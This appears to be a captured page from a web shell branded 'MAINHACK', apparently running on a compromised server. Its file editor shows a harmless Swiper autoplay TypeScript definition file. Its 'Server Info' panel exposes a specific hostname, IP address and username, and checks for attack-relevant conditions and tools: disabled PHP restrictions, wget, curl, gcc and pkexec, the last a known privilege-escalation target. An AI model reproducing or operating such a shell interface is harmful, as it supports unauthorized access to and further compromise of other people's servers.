[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: autoplay.d.ts
import Swiper from '../swiper-class'; export interface AutoplayMethods { /** * Whether autoplay enabled and running */ running: boolean; /** * Whether autoplay is paused */ paused: boolean; /** * Pause autoplay */ pause(speed?: number): void; /** * Run the autoplay logic */ run(): void; /** * Start autoplay */ start(): boolean; /** * Stop autoplay */ stop(): boolean; } export interface AutoplayEvents { /** * Event will be fired in when autoplay started */ autoplayStart: (swiper: Swiper) => void; /** * Event will be fired when autoplay stopped */ autoplayStop: (swiper: Swiper) => void; /** * Event will be fired on autoplay pause (on mouse/pointer enter), when `pauseOnMouseEnter` enabled */ autoplayPause: (swiper: Swiper) => void; /** * Event will be fired on autoplay resume (on mouse/pointer leave), when `pauseOnMouseEnter` enabled */ autoplayResume: (swiper: Swiper) => void; /** * Event will be fired when slide changed with autoplay */ autoplay: (swiper: Swiper) => void; } /** * Object with autoplay parameters or boolean `true` to enable with default settings. * * @example * ```js * const swiper = new Swiper('.swiper', { * autoplay: { * delay: 5000, * }, * }); * ``` */ export interface AutoplayOptions { /** * Delay between transitions (in ms). If this parameter is not specified, auto play will be disabled * * If you need to specify different delay for specific slides you can do it by using * `data-swiper-autoplay` (in ms) attribute on slide. * * @example * ```html * <!-- hold this slide for 2 seconds --> * <div class="swiper-slide" data-swiper-autoplay="2000"> * ``` * * @default 3000 */ delay?: number; /** * Enable this parameter and autoplay will be stopped when it reaches last slide (has no effect in loop mode) * * @default false */ stopOnLastSlide?: boolean; /** * Set to `false` and autoplay will not be disabled after user interactions (swipes), * it will be restarted every time after interaction * * @default true */ disableOnInteraction?: boolean; /** * Enables autoplay in reverse direction * * @default false */ reverseDirection?: boolean; /** * When enabled autoplay will wait for wrapper transition to continue. * Can be disabled in case of using Virtual Translate when your * slider may not have transition * * @default true */ waitForTransition?: boolean; /** * When enabled autoplay will be paused on mouse enter over Swiper container. If `disableOnInteraction` is also enabled, it will stop autoplay instead of pause * * @default false */ pauseOnMouseEnter?: boolean; }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.71 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002